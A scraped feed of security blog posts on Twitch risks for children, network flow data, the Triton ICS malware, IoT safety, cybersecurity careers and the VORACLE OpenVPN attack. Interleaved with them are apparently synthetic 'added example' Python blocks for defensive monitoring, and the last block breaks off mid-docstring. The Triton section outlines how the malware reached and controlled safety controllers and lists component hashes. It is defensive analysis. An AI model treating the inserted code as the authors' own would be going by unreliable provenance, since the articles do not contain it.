Live streaming is also free and global so gamers from any country can connect in any language. You’ll find streamers playing games in Turkish, Russian, Spanish, and the list goes on. Many streamers have gone from amateurs to gaming celebrities with elaborate production and marketing of their Twitch or YouTube feeds.

Some streamers hold marathon streaming sessions and multi-player competitions designed to benefit charities. Twitch is also appealing because it allows users to watch popular gaming conventions such as TwitchCon, E3, and Comic-Con. There are also live gaming talk shows and podcasts, and a channel where users can watch people do everyday things like cook, create pieces of art, or play music.

The Risks

Although Twitch’s community guidelines prohibit violent behavior, sexual content, bullying and harassment, browsing through some of the live games suggests that many users don’t take the guidelines seriously.

Here are just a few things to keep in mind if your kids frequent live streaming communities like Twitch.

  1. Bullying. Bullying happens on every social network in some form. Twitch is no different. In one study, over 13% of respondents said they felt personally attacked on Twitch, and more than 27% have witnessed racial or gender-based bullying in live streaming.
  2. Crude language. While there are streamers who put a big emphasis on keeping things clean, most Twitch streamers do not. Some streamers will put up a “mature content” warning before you click on their site. Both streamers and viewers can get harsh with language, conversations, and points of view.
  3. Violent games. Many of the games on Twitch are violent and intended for mature viewers. However, you can also find milder games such as Minecraft and Mario Brothers if your kids are younger. The best way to assess a game’s violence is to sit and watch it with your child.
  4. Health risks. Sitting and playing video games for extended periods of time can affect players’ and viewers’ physical and emotional well-being. In the most extreme cases, gamers have died due to excessive gaming.
  5. Costs. Twitch is free to sign up and watch games, but if you want the extras (no ads), it’s $8.99 a month. Viewers can also subscribe to individual gamers’ feeds and purchase “bits” to cheer on their favorite players (kind of like badges), which can add up quickly.
  6. Stalking. Viewers have been known to stalk, harass, rob, and try to meet celebrity streamers. Recently, Twitch announced both private and public chat rooms to try to boost privacy among users.
  7. Swatting. An increasingly popular practice called “swatting” involves reporting a fake emergency at the home of the victim in order to send a SWAT team to barge in on them. Some swatting incidents connected to Twitch have ended tragically.
  8. Wasted time. Marathon gaming sessions, skipping school to play or view games, and gaming through the night are common in Twitch communities. Twitch, like any other social network, needs parental attention and ground rules.
  9. Privacy. Spending a lot of time with people in an online “community” can result in a false sense of trust. Often kids will answer an innocent question in a live chat such as where they live or what school they go to. Leaking little bits of information over time allows a corrupt person to piece together a picture of your data.

An endnote: If your kids love Twitch or live stream gaming on YouTube or other sites, spend some time on those sites. Listen to the conversations your kids are having with others online. What’s the tone? Is there too much sarcasm or cruel “joking” going on? Put time limits on screen time and remember balance and monitoring is key to guiding healthy online habits.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)


The post What Parents Need to Know About Live-Stream Gaming Sites Like Twitch appeared first on McAfee Blogs.

Why You Should Start Leveraging Network Flow Data Before the Next Big Breach

Organizations tend to end up in cybersecurity news because they failed to detect and/or contain a breach. Breaches are inevitable, but whether or not an organization ends up in the news depends on how quickly and effectively it can detect and respond to a cyber incident.

Beyond the fines, penalties and reputational damage associated with a breach, organizations should keep in mind that today’s adversaries represent a real, advanced and persistent threat. Once threat actors gain a foothold in your infrastructure or network, they will almost certainly try to maintain it.

To successfully protect their organizations, security teams need the full context of what is happening on their network. This means data from certain types of sources should be centrally collected and analyzed, with the goal of being able to extract and deliver actionable information.

What Is Network Flow Data?

One of the most crucial types of information to analyze is network flow data, which has unique properties that provide a solid foundation on which a security framework should be built. Network flow data is extracted — by a network device such as a router — from the sequence of packets observed within an interval between two internet protocol (IP) hosts. The data is then forwarded to a flow collector for analysis.

A unique flow is defined by the combination of the following seven key fields:

  1. Source IP address
  2. Destination IP address
  3. Source port number
  4. Destination port number
  5. Layer 3 protocol type
  6. Type of service (ToS)
  7. Input logical interface (router or switch interface)

If any one of the packet values for these fields is found to be unique, a new flow record is created. The depth of the extracted information depends on both the device that generates the flow records and the protocol used to export the information, such as NetFlow or IP Flow Information Export (IPFIX). Inspection of the traffic can be performed at different layers of the Open Systems Interconnection (OSI) model — from layer 2 (the data link layer) to layer 7 (the application layer). Each layer that is inspected adds more meaningful and actionable information for a security analyst.

One major difference between log event data and network flow data is that an event, which typically is a log entry, happens at a single point in time and can be altered. A network flow record, in contrast, describes a condition that has a life span, which can last minutes, hours or days, depending on the activities observed within a session, and cannot be altered. For example, a web GET request may pull down multiple files and images in less than a minute, but a user watching a movie on Netflix would have a session that lasts over an hour.

What Makes Network Flow Data So Valuable?

Let’s examine some of the aforementioned properties in greater detail.

Low Deployment Effort

Network flow data requires the least deployment effort because networks aggregate most of the traffic in a few transit points, such as the internet boundary, and the changes made to those transit points are not often prone to configuration mistakes.

Everything Is Connected

From a security perspective, we can assume that most of the devices used by organizations, if not all of them, operate on and interact with a network. Those devices can either be actively controlled by individuals — workstations, mobile devices, etc. — or operated autonomously — servers, security endpoints, etc.

Furthermore, threat actors typically try to remove traces of their attacks by manipulating security and access logs, but they cannot tamper with network flow data.

Reliable Visibility

The data relevant to security investigations is typically collected from two types of sources:

  • Logs from endpoints, servers and network devices, using either an agent or remote logging; or
  • Network flow data from the network infrastructure.

The issue with logs is that there will always be connected devices from which an organization cannot collect data. Even if security policies mandate that only approved devices may be connected to a network, being able to ensure that unmanaged devices or services have not been inserted into the network by a malicious user is crucial. Furthermore, history has shown that malicious users actively attempt to circumvent host agents and remote logging, making the log data from those hosts unreliable. The most direct source of information about unmanaged devices is the network.

Finally, network flow data is explicitly defined by the protocol, which changes very slowly. This is not the case with log data, where formats are very often poorly documented, tied to specific versions, not standardized and prone to more frequent changes.

Automatically Reduce False Positives

A firewall or access control list (ACL) permit notification does not mean that a successful communication actually took place. Network flow data, on the other hand, can confirm that a communication actually completed. Being able to withhold an alert unless a successful communication took place can dramatically reduce false positives and, therefore, save precious security analyst time.
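The following added example (not code from the article) ties together the two points above: it builds flow records from packets keyed on the seven fields listed under "What Is Network Flow Data?", so that any change in one field opens a new record, and then uses those records to decide which firewall PERMIT entries represent a communication that actually completed, defined here as traffic seen in both directions. The packets, the permit log format, the addresses and the interface names are all constructed for the example.

```python
"""Flow records from packets on the seven NetFlow key fields, then permits checked against them.

Packets sharing all seven key fields merge into one flow record with a life span
(first/last seen, packet and byte counts); a packet differing in any field starts a
new record. A firewall PERMIT line is confirmed only when flows exist in both
directions. Packets, permit lines, addresses and interface names are constructed.
"""
from collections import namedtuple
from dataclasses import dataclass
import re

# The seven fields that define a unique flow, in the order the article lists them.
FlowKey = namedtuple("FlowKey", "src_ip dst_ip src_port dst_port proto tos in_if")


@dataclass
class Flow:
    first_seen: str
    last_seen: str
    packets: int
    bytes: int


def aggregate_flows(packets):
    """Merge packets into flow records; a key that differs in any field opens a new flow."""
    flows = {}
    for p in packets:
        key = FlowKey(p["src"], p["dst"], p["sport"], p["dport"], p["proto"], p["tos"], p["in_if"])
        flow = flows.get(key)
        if flow is None:
            flows[key] = Flow(p["ts"], p["ts"], 1, p["len"])
        else:
            flow.last_seen = p["ts"]
            flow.packets += 1
            flow.bytes += p["len"]
    return flows


# Constructed firewall log format, e.g. "2018-11-20T10:00:01 PERMIT tcp 10.0.0.5:51000 -> 203.0.113.10:443"
PERMIT_RE = re.compile(
    r"^(?P<ts>\S+) PERMIT (?P<proto>\w+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)
Permit = namedtuple("Permit", "ts proto src sport dst dport")


def parse_permit(line):
    m = PERMIT_RE.match(line.strip())
    if not m:
        return None
    return Permit(m["ts"], m["proto"], m["src"], int(m["sport"]), m["dst"], int(m["dport"]))


def communication_confirmed(flows, permit):
    """True only if traffic was seen in both directions; ToS and input interface may differ."""
    forward = any(k.src_ip == permit.src and k.src_port == permit.sport and k.dst_ip == permit.dst
                  and k.dst_port == permit.dport and k.proto == permit.proto for k in flows)
    reverse = any(k.src_ip == permit.dst and k.src_port == permit.dport and k.dst_ip == permit.src
                  and k.dst_port == permit.sport and k.proto == permit.proto for k in flows)
    return forward and reverse


def confirmed_permits(flows, permit_lines):
    """Keep only permits that flow data shows became a real session; the rest stay silent."""
    permits = (parse_permit(line) for line in permit_lines)
    return [p for p in permits if p is not None and communication_confirmed(flows, p)]


def pkt(ts, src, sport, dst, dport, in_if, length, proto="tcp", tos=0):
    return {"ts": ts, "src": src, "sport": sport, "dst": dst, "dport": dport,
            "proto": proto, "tos": tos, "in_if": in_if, "len": length}


# Constructed packets as a router would see them on its input interfaces.
PACKETS = [
    # Session 1: inside host to an HTTPS server; replies arrive on the outside interface.
    pkt("10:00:01", "10.0.0.5", 51000, "203.0.113.10", 443, "Gi0/1", 60),
    pkt("10:00:01", "203.0.113.10", 443, "10.0.0.5", 51000, "Gi0/0", 60),
    pkt("10:00:02", "10.0.0.5", 51000, "203.0.113.10", 443, "Gi0/1", 517),
    pkt("10:00:02", "203.0.113.10", 443, "10.0.0.5", 51000, "Gi0/0", 1460),
    pkt("10:00:09", "10.0.0.5", 51000, "203.0.113.10", 443, "Gi0/1", 52),
    # Same 5-tuple but a different ToS marking: by definition a separate flow record.
    pkt("10:00:10", "10.0.0.5", 51000, "203.0.113.10", 443, "Gi0/1", 52, tos=0x10),
    # Session 2: SSH attempts the firewall permitted, but the server never answered.
    pkt("10:01:00", "10.0.0.7", 52000, "198.51.100.20", 22, "Gi0/1", 60),
    pkt("10:01:03", "10.0.0.7", 52000, "198.51.100.20", 22, "Gi0/1", 60),
]

PERMIT_LOG = [
    "2018-11-20T10:00:01 PERMIT tcp 10.0.0.5:51000 -> 203.0.113.10:443",
    "2018-11-20T10:01:00 PERMIT tcp 10.0.0.7:52000 -> 198.51.100.20:22",
]

if __name__ == "__main__":
    flows = aggregate_flows(PACKETS)
    for key, flow in flows.items():
        print(f"{key.src_ip}:{key.src_port} -> {key.dst_ip}:{key.dst_port} tos={key.tos} "
              f"if={key.in_if} pkts={flow.packets} bytes={flow.bytes} {flow.first_seen}..{flow.last_seen}")
    for p in confirmed_permits(flows, PERMIT_LOG):
        print("confirmed:", p)
```

Of the two permits, only the HTTPS session is confirmed; the SSH permit never produced a reverse flow and would not raise an alert.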

Moving Beyond Traditional Network Data

Traditional network flow technology was originally designed to provide network administrators with the ability to monitor their network and pinpoint network congestion. More recently, security analysts discovered that network flow data was also useful to help them find network intrusions. However, basic network flow data was never designed to detect the most sophisticated advanced persistent threats (APTs). It does not provide the necessary in-depth visibility, such as the hash of a file transferred over a network or the detected application, as opposed to the port number, to name a few. By lacking this level of visibility, traditional network flow data greatly limits the ability to provide actionable information about a cyber incident.

Given the increasing level of sophistication of attacks, certain communications, such as inbound traffic from the internet, should be further scrutinized and inspected with a purpose-built solution. The solution must be able to perform detailed packet dissection and analysis — at line speed and in passive mode — and deliver extensive and enriched network flow data through a standard protocol such as IPFIX, which defines how to format and transfer IP flow data from an exporter to a collector.

The resulting enriched network flow data can be used to augment the prioritization of relevant alerts. Such data can also accelerate alert-handling research and resolution.

Why You Should Analyze Network Flow Data

Network flow data is a crystal ball into your environment because it delivers much-needed and immediate, in-depth visibility. It can also help security teams detect the most sophisticated attacks, which would otherwise be missed if investigation relied solely on log data. By reconciling network flow data with less-reliable log data, organizations can detect attacks more capably and conduct more thorough investigations. The bottom line is that network flow data can help organizations catch some of the most advanced attacks that exist, and it should not be ignored.

The post Why You Should Start Leveraging Network Flow Data Before the Next Big Breach appeared first on Security Intelligence.

Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an accidental shutdown of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered in public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.

ICS malware is critical because it infects industrial devices and automation. However, regular malware can also impact industrial processes. Last year WannaCry forced several companies, from the medical to the automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a Wireshark dissector that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

How to detect an unusual network connection

Nozomi Networks has created a script that simulates a Triconex safety controller. We adapted this script to run on a Raspberry Pi to create a cheap detector tool.


This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.
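A minimal software version of that canary, as an added example that is neither Nozomi's simulator nor McAfee's Raspberry Pi build: it binds the TriStation port (UDP/1502, as given above), never replies, and hands any datagram from a source outside a constructed allowlist of engineering workstations to an alert hook, which on the Pi would drive the LED and buzzer. It does not parse TriStation; it only records who spoke to the port.

```python
"""UDP/1502 canary: alert on any TriStation-port datagram from outside the engineering allowlist.

Added example, not Nozomi's simulator nor McAfee's Raspberry Pi tool. The listener
never answers (so it never pretends to be a controller), records the source of every
unexpected datagram, and calls an alert hook. Allowlist and addresses are constructed.
"""
import ipaddress
import socket
from dataclasses import dataclass

TRISTATION_UDP_PORT = 1502  # port used by the TriStation protocol, from the article


@dataclass(frozen=True)
class Alert:
    src_ip: str
    src_port: int
    payload_len: int
    payload_prefix_hex: str  # first bytes only, kept for the investigation record


class TriStationCanary:
    """Passive listener: nothing it receives is parsed, it only notes who talked to it."""

    def __init__(self, allowed_sources, alert_hook):
        # Constructed allowlist: the engineering workstations permitted to speak TriStation.
        self.allowed = [ipaddress.ip_network(n, strict=False) for n in allowed_sources]
        self.alert_hook = alert_hook
        self.alerts = []

    def is_allowed(self, src_ip):
        addr = ipaddress.ip_address(src_ip)
        return any(addr in net for net in self.allowed)

    def handle_datagram(self, data, src):
        """Return an Alert for an unexpected source, None for an allowlisted one."""
        src_ip, src_port = src
        if self.is_allowed(src_ip):
            return None
        alert = Alert(src_ip, src_port, len(data), data[:8].hex())
        self.alerts.append(alert)
        self.alert_hook(alert)
        return alert

    def serve(self, bind_ip="0.0.0.0", max_datagrams=None):
        """Bind UDP/1502 and process datagrams until max_datagrams is reached (None: forever)."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.bind((bind_ip, TRISTATION_UDP_PORT))
        handled = 0
        try:
            while max_datagrams is None or handled < max_datagrams:
                data, src = sock.recvfrom(4096)
                self.handle_datagram(data, src)
                handled += 1
        finally:
            sock.close()


def console_alarm(alert):
    """Stand-in for the LED and siren: print the source address for investigation."""
    print(f"ALERT unexpected TriStation traffic from {alert.src_ip}:{alert.src_port} "
          f"({alert.payload_len} bytes, starts {alert.payload_prefix_hex})")


if __name__ == "__main__":
    # Constructed allowlist; binding UDP/1502 may require elevated privileges on some systems.
    TriStationCanary(["10.10.1.0/24"], console_alarm).serve()
```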

The following picture shows how to connect the LED and buzzer.

Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICSs are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

  • Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and two-factor authentication, card readers, surveillance cameras, etc.
  • Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
  • Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
  • Log and monitor every action on the ICS network to quickly identify a point of failure
  • When possible implement redundancy on critical devices to avoid major issues
  • Develop strong security policies and an incident response plan to restore systems during an incident
  • Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.


Indicators of compromise



The post Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems appeared first on McAfee Blogs.

Complexity is the Worst Enemy of Security, Time for a New Approach with Network Security?

Bruce Schneier summed it up best in 1999 when he said "Complexity is the Worst Enemy of Security" in an essay titled A Plea for Simplicity, correctly predicting the cybersecurity problems we encounter today.

The IT industry has gone through lots of changes over the past few years, yet when it comes to cybersecurity, the mindset has remained the same. The current thinking around cybersecurity fits the definition of insanity: many organisations do the same thing over and over again, expect different results, and are then shocked when their company is the latest to hit the hacking headlines.

The current security model is broken and is currently too complex. As Paul German, CEO, Certes Networks, argues, it’s time to strip network security back and focus on the data. 

What should Organisations Really be Protecting?
Ultimately, by overcomplicating network security for far too long, the industry has failed, which won’t come as a surprise to many. We’ve all learned the lessons from high-profile data breaches such as Dixons Carphone and historical breaches like Ticketmaster or Target; what they succeeded in showing us was that current attempts to secure corporate networks are just not enough. And the reason for this? Quite simply, it’s because organisations are trying to protect something they no longer own. For a long time, security thinking has focused purely on the network, homing in on the insecurity of the network and trying to build up network defences to protect the data that runs over it.

Yet this way of thinking still leaves a problem untouched: we don’t always own the networks over which our data runs, so focusing on this aspect leaves many other doors wide open. The corporate network used to remain in the data centre, but in today’s digital economy it spans corporate locations worldwide, including data centres, private clouds and public clouds. Additionally, this data is shared not just with employees but with third parties whose devices and policies cannot be easily controlled. Add legacy security measures into the mix, which simply weren’t constructed to address the complexity and diversity of today’s corporate network, and it is extremely apparent why this is no longer enough.

So, what needs to change? First and foremost, the industry needs to take a step in the right direction and put data at the forefront of security strategies.

The Security Mindset Needs to Change - and It Needs to Change Now
In an attempt to keep their data and infrastructure secure, organisations have layered technology on top of technology. As a result of this, not only has the technology stack itself become far too complicated but the number of resources, operational overhead and cost needed to manage it have only contributed to the failing security mindset.

Anyone in the IT industry should be able to acknowledge that something needs to change. The good news is that the change is simple. Organisations need to start with a security overlay that covers the networks, independent of the infrastructure, rather than taking the conventional approach of building the strategy around the infrastructure. The network itself must become irrelevant, which will then encourage a natural simplicity in approach.

As well as enabling organisations to better secure their data, this approach also has economic and commercial benefits. Taking intelligence out of the network allows organisations to focus it on its core task: managing traffic. In turn, money and resources can be saved and then better invested in a true security model with data protection at its heart.

A New Era of Cybersecurity
To begin this mindset change, organisations need to start thinking about security as an overlay on top of existing infrastructure. They also need to introduce a software-defined approach to data security, enabling centralised orchestration of security policy. When this centralised orchestration enforces capabilities such as software-defined application access control, cryptographic segmentation, data-in-motion privacy and a software-defined perimeter, data is protected on its journey across any network, while hackers are restricted from moving laterally across the network once a breach has occurred. Additionally, adopting innovative approaches such as Layer 4 encryption, which renders the data itself useless, and therefore worthless, to hackers without impacting the operational visibility of the enterprise network and data flows, will further ensure the protection of the organisation’s network.

The fact is that the industry has overcomplicated network security for too long. If the industry continues to try the same methods over and over again, without making any changes, then there is no chance of progression. It’s time for organisations to start afresh and adopt a new, simple software-defined security overlay approach. 

IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle

If you took an inventory of your digital possessions chances are, most of your life — everything from phones to toys, to wearables, to appliances — has wholly transitioned from analog to digital (rotary to wireless). What you may not realize is that with this dramatic transition, comes a fair amount of risk.

Privacy for Progress

With this massive tech migration, an invisible exchange has happened: Privacy for progress. Here we are intentionally and happily immersed in the Internet of Things (IoT). IoT is defined as everyday objects with computing devices embedded in them that can send and receive data over the internet.

That’s right. Your favorite fitness tracking app may be collecting and giving away personal data. That smart toy, baby device, or video game may be monitoring your child’s behavior and gathering information to influence future purchases. And, that smart coffee maker may be transmitting more than just good morning vibes.

A Gartner report estimated there were 8.4 billion connected “things” in 2017 and as many as 20 billion by 2020. The ability of some IoT devices is staggering and, frankly, a bit frightening. The data collection ability of smart devices and services on the market is far greater than most of us realize. Rooms, devices, and apps come equipped with sensors and controls that can gather and inform third parties about consumers.

Lockdown IoT devices:

  • Research product security. With so many cool products on the market, it’s easy to be impulsive and skip your research but don’t. Read reviews on a product’s security (or lack of). Going with a name brand that has a proven security track record and has worked out security gaps may be the better choice.
  • Create new passwords. Most every IoT device will come with a factory default password. Hackers know these passwords and will use them to break into your devices and gain access to your data. Take the time to go into the product settings (general and advanced) and create a unique, strong password.
  • Keep product software up-to-date. Manufacturers often release software updates to protect customers against vulnerabilities and new threats. Set your device to auto-update, if possible, so you always have the latest, safest upgrade.
  • Get an extra layer of security. Managing and protecting multiple devices in our already busy lives is not an easy task. To make sure you are protected consider investing in software that will give you antivirus, identity and privacy protection for your PCs, Macs, smartphones, and tablets—all in one subscription.
  • Stay informed. Think about it, crooks make it a point to stay current on IoT news, so shouldn’t we? Stay a step ahead by staying informed. Keep an eye out for any news that may affect your IoT security (or specific products) by setting up a Google alert.

A connected life is a good life, no doubt. The only drawback is that criminals fully understand our growing dependence and affection for IoT devices and spend most of their time looking for vulnerabilities. Once they crack our network from one angle, they can reach other data-rich devices and possibly access private and financial data.

As Yoda says, “with much power comes much responsibility.” Discuss with your family the risks that come with smart devices and how to work together to lock down your always-evolving, hyper-connected way of life.

Do you enjoy podcasts and wish you could find one that helps you keep up with digital trends and the latest gadgets? Then give McAfee’s podcast Hackable a try.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle appeared first on McAfee Blogs.

Have You Talked to Your Kids About a Career in Cybersecurity?

Here’s some cool trivia for you: What profession currently has a zero-percent unemployment rate, pays an average of $116,000 a year, and is among the top in-demand jobs in the world? A lawyer? A pharmacist? A finance manager, perhaps?

Nope. The job we’re talking about is a cybersecurity specialist and, because of the increase in cyber attacks around the world, these professionals are highly employable.

Job Security

According to numbers from the Bureau of Labor and Statistics, a career in cybersecurity is one of the most in-demand, high-paying professions today with an average salary of $116,000, or approximately $55.77 per hour. That’s nearly three times the national median income for full-time wage and salary workers. How’s that for job security?

Why is the demand so high? Sadly, because there are a lot of black hats (bad guys) out there who want our data — our user IDs, passwords, social security numbers, and credit card numbers. Every month it seems banks, hospitals, and major corporations are reporting security breaches, which has put the global cybersecurity talent pool at an estimated deficit of two million professionals.

It’s exciting to see gifts and passions emerge in our kids as they grow and mature. If a child is good at math and sciences, we might point them toward the medical field. If a child shows an affinity for English and communication skills, maybe a law, teaching, or media career is in their future.

But what about a cybersecurity expert? Have you noticed any of these skills in your kids?

Cybersecurity skills/traits:

  • Problem-solving
  • Critical thinking
  • Flexible/creative problem solving
  • Collaborative, team player
  • Continual learner
  • Gaming fan
  • A sense of duty, justice
  • Persistent, determined
  • Works well under pressure
  • Curious and perceptive
  • Technology/tech trend fan
  • Verbal and written communications

Education

Most jobs in cybersecurity require a four-year bachelor’s degree in cybersecurity or a related field such as information technology or computer science. Students take coursework in programming and statistics, ethics, and computer forensics, among other courses.

Conversation Starters

First, if your child has some of the skills/personality traits mentioned, how do you start directing him or her toward this field? The first place to begin is in the home. Model smart cybersecurity habits. Talk about digital safety, the importance of protecting personal data and the trends in cybercrimes. In short, model and encourage solid digital citizenship and family security practices.

Second, bring up the possibility, or plant the seed. Be sure to encourage both boys and girls equally. Help your child find answers to his or her questions about careers in computer and data science, threat research, engineering and information on jobs such as cybersecurity analyst, vulnerability analyst, and penetration tester.

Third, read and share takeaways from Winning The Game, a McAfee report that investigates the key challenges facing the IT Security industry and the possible link between teen gaming and a successful cybersecurity career.

Additional resources*

CyberCompEx. A connection point for everything cybersecurity including forums, groups, news, jobs, and competition information.

CyberCorps® Scholarship for Service. SFS is a program providing scholarships and stipends to undergraduate and graduate students studying cybersecurity at participating institutions. Great for those who want to work in government.

CyberPatriot. This site is created by the Air Force Association (AFA) to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM).

GenCyber. This is a summer cybersecurity camp for K-12 students and teachers that focuses on inspiring kids to direct their talents toward cybersecurity skills and closing the security skills gap.

National CyberWatch Center. The National CyberWatch Center is a consortium of higher education institutions, public and private businesses, and government agencies focused on advancing cybersecurity education and strengthening the workforce.

National Initiative for Cybersecurity Careers and Studies. NICCS provides information on cybersecurity training, formal education, and workforce development.

National Initiative for Cybersecurity Education. NICE is an initiative to energize and promote a robust network and an ecosystem of cybersecurity education, cybersecurity careers, training, and workforce development.

*Resource list courtesy of Stay Safe Online.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post Have You Talked to Your Kids About a Career in Cybersecurity? appeared first on McAfee Blogs.

The VORACLE OpenVPN Attack: What You Need to Know

Many of us know that using a VPN (Virtual Private Network) adds an extra layer of security to our Wi-Fi connections. But VORACLE, a recently discovered vulnerability that was announced at a security conference by security researcher Ahamad Nafeez, is making some people reconsider this steadfast safety tip. Let’s look under the hood at this vulnerability to understand what was impacted and why, and what we should do in the future when it comes to safely connecting to Wi-Fi.

Under the Hood of a VPN

A VPN is a connection between a secure server and your mobile device or computer. Through the VPN your activity and information on the internet is encrypted, making it difficult for anyone else to see your private information. Many of us use a VPN for work when we travel, some of us use them to watch videos online, and more and more of us use them as a best practice to help keep our information safe any time we want to use a Wi-Fi connection that we’re not sure about.

About the VORACLE VPN Vulnerability

At a high level, VORACLE leverages a vulnerability in OpenVPN, an open-source VPN protocol used by the majority of VPN providers, meaning many VPN products are affected.

The VORACLE attack can recover HTTP traffic sent via encrypted VPN connections under certain conditions. The first is that the VPN app in use enables compression via the OpenVPN protocol. A hacker must also be on the same network and able to lure you to an HTTP (not HTTPS) site containing malicious code, through phishing or a similar tactic. The attack can happen on all web browsers except Google Chrome, due to the way in which Chrome makes HTTP requests.
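The compression condition above is something a defender can check for directly in OpenVPN configuration files. The Python script below is an added example, not code from McAfee or the OpenVPN project: it flags the OpenVPN directives that enable, or let a server push, compression of tunnelled traffic. The directive names (comp-lzo, compress, allow-compression) are real OpenVPN options; allow-compression arrived in OpenVPN 2.5, after this post was written. The two sample configs, the hostname vpn.example.invalid and the function name audit_openvpn_compression are constructed for this example.

```python
"""Audit an OpenVPN config for the compression settings VORACLE needs.

Added example; not McAfee's or OpenVPN's code. Directive semantics follow
the OpenVPN manual: a bare 'comp-lzo' means 'comp-lzo adaptive', a bare
'compress' enables only the framing (no compression), and
'allow-compression no' (OpenVPN 2.5+) refuses compression even if the
server tries to push it.
"""

import re

# Constructed sample configs for this example (not real deployments).
WEAK_CONFIG = """\
client
dev tun
proto udp
remote vpn.example.invalid 1194
comp-lzo yes
cipher AES-256-GCM
"""

HARDENED_CONFIG = """\
client
dev tun
proto udp
remote vpn.example.invalid 1194
allow-compression no
cipher AES-256-GCM
"""

# 'compress' arguments that actually compress data; 'stub'/'stub-v2' do not.
COMPRESSING_ALGOS = {"lzo", "lz4", "lz4-v2"}


def audit_openvpn_compression(config_text):
    """Return one finding string per directive that enables compression of
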